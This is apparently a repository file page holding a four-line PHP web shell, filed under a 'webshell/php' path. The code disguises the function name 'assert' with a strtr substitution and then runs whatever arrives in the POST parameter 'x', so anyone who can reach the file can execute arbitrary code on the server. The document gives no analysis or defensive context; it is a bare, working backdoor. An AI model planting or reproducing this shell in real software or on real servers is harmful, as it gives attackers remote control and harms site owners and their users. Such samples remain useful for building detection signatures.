webshell/php/2020.08.20.02.php

4 lines
71 B
PHP

<?php
$a = strtr('azxcvt','zxcv','sser');
$a($_POST['x']);
?>